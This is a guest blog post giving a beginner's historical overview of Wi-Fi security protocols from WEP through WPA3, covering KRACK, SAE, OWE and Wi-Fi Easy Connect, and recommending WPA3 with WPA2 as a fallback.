Wi-Fi Password Security - WEP, WPA, WPA2, WPA3 - A Beginner's Guide and Historical Overview (Guest Blog)By Yury D. Morales On 05/18/2022
By 2021 we reached 20+ billion WLAN connected devices worldwide, which raises an important question: what are the protocols that bring us Wi-Fi Security? For that, we must start describing Wi-Fi as a network that uses wireless radio signals to transmit and receive data, and security as accepted levels of freedom from risk or danger.
To achieve this security with non-enterprise solutions, we can divide it into the first half, the passphrases, and the second half, the encryption used. Because of the latter, your network and devices can be vulnerable, secured, or more secured, depending on the type of encryption from the wireless security protocol that you are using. What are these? The following:
- WEP (Wired Equivalent Privacy)
- WPA (Wi-Fi Protected Access)
- WPA2 (Wi-Fi Protected Access 2)
- WPA3 (Wi-Fi Protected Access 3)
WEP (Wired Equivalent Privacy)
WEP (Wired Equivalent Privacy) was the first one developed in 1997, attempting to bring, as its name describes, the same security as wired devices. Initially, it was used only with maximum 64-bit encryption until 128-bit and 256-bit WEP became available in some devices and allows by regulations.
Cybersecurity experts detected many vulnerabilities that compromised any network protected by WEP. Therefore, the Wi-Fi Alliance retired it officially in 2004. For today's world, WEP is not a secure protocol and it is outdated. It should not be used anywhere, anytime, in any way, when actual security is required.
WPA (Wi-Fi Protected Access)
Wi-Fi Protected Access (WPA) was developed in 2003 by the Wi-Fi Alliance in response to the vulnerabilities, using 256-bit WPA-PSK (Pre-Shared Key). It was not an IEEE standard (that is, not part of the 802.11 protocol) at that time, though it was in draft mode. The IEEE would incorporate it into the 802.11i-2004 amendment at a later date.
With WPA, two new security mechanisms were introduced: Message Integrity Check (MIC) and Temporal Key Integrity Protocol (TKIP). With the Message Integrity Check mechanism, it prevents active and passive man-in-the-middle attacks on the content of any packet. With TKIP, each data packet is encrypted using a different key. After a while instead of TKIP, AES (Advanced Encryption Standard) would be made available, though it was not used heavily in production networks.
There were two different modes of WPA:
- Personal Mode (WPA-PSK): Pre shared keys (PSK) were used with this mode intended for individuals.
- Enterprise Mode (WPA-EAP): Extensible Authentication Protocol (EAP) was used along with an Authentication Server, and it was more secure.
WPA is more secure than WEP. Despite this, different security vulnerabilities were discovered and it is considered outdated as well. Like WEP, WPA should not be used anywhere, anytime, in any way, when actual security is required.
WPA2 (Wi-Fi Protected Access 2)
WPA2 (Wi-Fi Protected Access 2) was developed in 2004 as a corrected and advanced version of the first WPA and in conjunction with the ratification of 802.11i, which defined the standards by which both WPA and WPA2 operated. Offering new encryption and authentication to cover the original WPA vulnerabilities (to be fair, WPA was intended only as a transitional solution for hardware unable to perform AES encryption). These were AES (Advanced Encryption Standard) and CCMP (Counter Cipher Mode with Block Chaining Message Authentication Code Protocol).
AES (Advanced Encryption Standard) was originally approved by the United States Government and its Military Forces, with the main purpose of encrypting state top secret information and as a replacement for the older DES (Data Encryption Standard) from the 1970s. After a while, it was thought that using AES on Wi-Fi networks could also improve security, and it did.
As mentioned before, WPA2 was not only a corrected version but an advanced one with improvements for Wi-Fi, too, such as fast roaming. This was due to the PMK caching support allowing for reconnections to AP's to which the client has recently been connected without the need to re-authenticate, and Pre-authentication support, allowing a client to pre-authenticate with an AP towards which it is moving while still maintaining a connection to the AP from which it's moving away.
WPA2 is the default security method for individuals and even enterprises (with the Enterprise mode). For SOHO networks, it is still a very secure option when properly implemented; nevertheless, for enterprises, it is a vulnerable one because of a discovered vulnerability where attackers can have access to the network secured with WPA2. This one is known as the KRACK attack, though most vendors patched their equipment quickly to be invulnerable to the most serious versions of this attack.
Until patched, approach WPA networks with the same caution as an open network. Since this vulnerability could potentially compromise the encryption of a wireless network, useful countermeasures were recommended until patches for specific devices were released. These countermeasures included using HTTPS for all websites and/or using a VPN to encrypt all network traffic.
WPA3 (Wi-Fi Protected Access 3)
The most recent security certification for Wireless is WPA3 (Wi-Fi Protected Access 3), and it offers improved authentication and encryption, which is the vulnerability in WPA2, based in KRACK. It is constantly being more used thanks to the 802.11ax standard, which requires it in the 6 GHz band or Wi-Fi 6E.
And speaking about Wi-Fi 6, this will bring more coverage and capacity; therefore, there will be more wireless devices connected. So better security will be needed, and for these requirements, WPA3 will be used with Wi-Fi 6 in all bands at some point; after all the clients connecting in the 2.4 GHz and 5 GHz bands support it, but it is required and used in all cases (when security other than OWE is used) in the 6 GHz band. Note that Wi-Fi 6 is simply 802.11ax in the traditional bands, while Wi-Fi 6E is extended into the 6 GHz band.
Within 802.11ax in the 6 GHz band or Wi-Fo 6E, there is another huge feature improving the known unsecure open networks. This is OWE (Opportunistic Wireless Encryption), as previously mentioned. OWE is a technology and mechanism mainly developed to be used for public or open networks. With it, encryption will occur without user interaction preventing man-in-the-middle attacks. It is similar to the way HTTPS websites work in that a secure negotiation process is used to generate encryption keys during the initial connection without requiring a pre-shared key or password.
Think about this. You are in your coffee shop working and connected with your PC, smartphone, and even tablet. With WPA3, any attacker in the same public place with you, won't be able to do a man-in-the-middle attack towards you. Unless the public network is WPA2 and unpatched, that is.
So far, it is known that dictionary attacks are used to predict passwords with many different and several attempts and work with WPA2. Hackers can do this attack even if they are not in the same network with the victim. To prevent this type of attack, WPA3 offers a new key negotiation protocol. With this protocol, it will use a secure method, Simultaneous Authentication of Equals handshake, known as SAE. Before with WPA2, the older four-way handshake was being used, and this is more vulnerable - particularly when unpatched against KRACK attacks.
WPA3 provides extra security and encryption if you compare it with its previous versions, such as WPA2, WPA, and WEP. With WPA3, all the traffic between you and the other end will be encrypted until the other end is authenticated.
Furthermore, there is also another new connection type that is coming with WPA3 called Wi-Fi Easy Connect. It reduces complexity and enhances the user experience of connecting devices to Wi-Fi networks while simultaneously incorporating the highest security standards. Wi-Fi Easy Connect introduces standardized mechanisms to simplify the provisioning and configuration of Wi-Fi devices. Provisioning and configuring devices, including those without a rich user interface, is now as simple as scanning the product's quick response (QR) code, NFC tag, or downloading device information from the cloud to enable zero-touch connection to a Wi-Fi network.
So, which one should I use?
Finally, with all this information you may be wondering "Which one should I use?". Evidently, WPA3. If it's not available, you can go with WPA2 knowing the potential weaknesses. When using WPA2 with a strong EAP method, it is still far more secure than WPA2-PSK and may continue to be used in many organizations for a few more years because of older devices in use. You can learn all the nitty-gritty details of these security solutions in the CWSP Certified Wireless Security Professional Study and Reference Guide available from CWNP.
Blog Disclaimer: The opinions expressed within these blog posts are solely the author’s and do not reflect the opinions and beliefs of the Certitrek, CWNP or its affiliates.